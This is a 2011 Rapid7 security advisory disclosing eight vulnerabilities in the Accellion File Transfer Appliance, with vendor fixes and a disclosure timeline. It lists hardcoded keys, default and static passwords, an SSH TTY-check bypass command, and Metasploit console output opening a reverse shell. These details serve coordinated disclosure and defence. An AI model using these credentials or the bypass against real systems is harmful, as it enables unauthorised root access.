R7-0039: Accellion File Transfer Appliance Multiple Vulnerabilities
February 7, 2011

-- Vulnerability Details:

The Accellion File Transfer Appliance, prior to version FTA_8_0_562,
suffers from a number of security flaws that can lead to a remote root
compromise.


1. Message Routing Daemon Default Encryption Keys

The appliance ships with UDP port 8812 allowed through the firewall. The
port correlates to an internal service that routes messages between
backend processes. To authenticate access to this service, all messages
must be encrypted with a secret key using the blowfish algorithm. The
appliance ships with two default keys, neither of which is random, which
results in an attacker being able to communicate with the internal
processes of the appliance and perform administration tasks on the
appliance itself. These two default keys are
123456789ABCDEF0123456789ABCDEF0 and 0123456789ABCDEF0123456789ABCDEF,
which are expanded with MD5 to create 448-bit blowfish keys.


2. MatchRep Daemon insert_plugin_meta_info() Command Injection

One of the applications that is exposed through the port 8812 message
routing service executes a system command without sanitizing the
arguments provided by the requesting application. This allows arbitrary
commands to be executed on the appliance. Combined with Issue #1, this
allows remote, unauthenticated command execution on the appliance as the
"soggycat" user, which is root equivalent (sudo rights). Rapid7 has
developed a Metasploit module[***] to chain these vulnerabilities and
will release this module in early March.


3. Remote Administration TTY Check Bypass

The appliance ships with a default login of admin/accellion. To reduce
the risk of remote attack, this account is not allowed to login over
Secure Shell. The implementation of this security check has a flaw and
it is still possible to configure an out-of-box Accellion appliance
remotely through SSH, simply by executing a shell without a TTY: (ssh
admin@target 'sh')


4. Static Passwords for Privileged User Accounts

The secure shell daemon is running by default and the system is
configured with static passwords for a number of root-equivalent
accounts. It is possible to crack these passwords and gain access to any
Accellion system with the secure shell daemon exposed. The scope of our
research did not provide time to crack these passwords, but it’s a just
a question of resource allocation. These accounts include
"soggycat","sdadmin", and the "root" user account itself.


5. Remote Access via Stale SSH Authorized Keys

The "soggycat" user account has a static password, as mentioned
previously, but also has two SSH keys configured for passwordless login.
These keys were generated over eight years ago and should have been
changed to reduce the risk of exposure. The comments of these two keys
are worrying as well:

[root@fta soggycat]# grep -i comment .ssh2/*.pub
.ssh2/theone.pub:Comment: "i am going to kiiiiiiiiiiiiill you"
.ssh2/thetwo.pub:Comment: "1024-bit dsa, kelvin@admin.c1s1.net, Mon Feb
25 2002 05:31:0


6. Weak MySQL Password for "root" Account

This issue is not exploitable by default due to firewall configuration
of the appliance, but it points to larger problems with the design of
the system. The root password for the MySQL server is simply "hawksql"
and all users of the system are able to read this password within
various configuration files. At the least, a non-root MySQL user account
should be used to reduce the risk of attack due to SQL  Injection flaws
in the rest of the application.


7. Internal Daemons not Bound to Loopback Interface

This issue is not exploitable by default due to firewall configuration
of the appliance. All internal services communicate through UDP services
bound to the 0.0.0.0 address. This exposes the internal workings of the
appliance to an attacker with network access to the system. For example,
a local user account without administrative rights would still be able
to escalate privileges by communicating with these internal services.


8. Rsync Daemon Allows Access to Privileged User Home Directory

This issue is not exploitable by default due to firewall configuration
of the appliance. The rsync daemon allows read/write access to the
"soggycat" home directory. Since this user account is root-equivalent,
any attacker than talk to the rsync daemon can take full control of the
appliance.


*** Information from the Metasploit module combining issues #1 and #2,
to be released in early March of 2011.


Description:
  This module exploits a chain of vulnerabilities in the Accellion
  File Transfer appliance. This appliance exposes a UDP service on
  port 8812 that acts as a gateway to the internal communication bus.
  This service uses Blowfish encryption for authentication, but the
  appliance ships with two easy to guess default authentication keys.
  This module abuses the known default encryption keys to inject a
  message into the communication bus. In order to execute arbitrary
  commands on the remote appliance, a message is injected into the bus
  destined for the 'matchrep' service. This service exposes a function
  named 'insert_plugin_meta_info' which is vulnerable to an input
  validation flaw in a call to system(). This provides access to the
  'soggycat' user account, which has sudo privileges to run the
  primary admin tool as root.

msf exploit(accellion_fta_mpipe2) > set RHOST 192.168.198.151
msf exploit(accellion_fta_mpipe2) > exploit

[*] Started reverse handler on 192.168.198.135:4444
[*] Command shell session 1 opened (192.168.198.135:4444 ->
192.168.198.151:42239) at 2010-11-15 23:50:35 -0600

id
uid=520(soggycat) gid=99(nobody) groups=99(nobody)



-- Vendor Response:

Accellion addressed item #3 on December 21st, 2010 with update FTA_8_0_540

Accellion addressed items #1, #2, #4, #5, #6, and #7 on January 17th,
2011 with update FTA_8_0_562

Item #8 is not exploitable in the default configuration and Accellion
recommends the use of SSL VPN when configuring a trusted link between
two appliances.

Official Changelog for FTA_8_0_562:

The update randomizes the following on the Accellion setup - Accellion
remote management user password, the system mysql password and the keys
used for encrypting inter-appliance communication. All internal Daemons
are now bound to Loopback Interface. The update also removes an unused
SSH key meant for remote troubleshooting login. These fixes are in
response to a security scan done by Rapid7.


-- Disclosure Timeline:
2010-10-21 - Issue #3 was reported to Accellion
2010-12-06 - Issues #1, #2, #4, #5, #6, #7, #8 reported to Accellion
2010-12-20 - A reminder the Rapid7 policy was sent to Accellion
2010-12-21 - Accellion responds with a fix date of January 2011
2010-12-21 - Accellion releases FTA_8_0_540 to address #3
2011-01-17 - Accellion releases FTA_8_0_562 to address remaining items
2011-02-07 - Detailed advisory released by Rapid7


-- Credit:
This vulnerability was discovered by HD Moore


-- About Rapid7 Security
Rapid7 provides vulnerability management, compliance and penetration
testing solutions for Web application, network and database security. In
addition to developing the NeXpose Vulnerability Management system,
Rapid7 manages the Metasploit Project and is the primary sponsor of the
W3AF web assessment tool.

Our vulnerability disclosure policy is available online at:

 http://www.rapid7.com/disclosure.jsp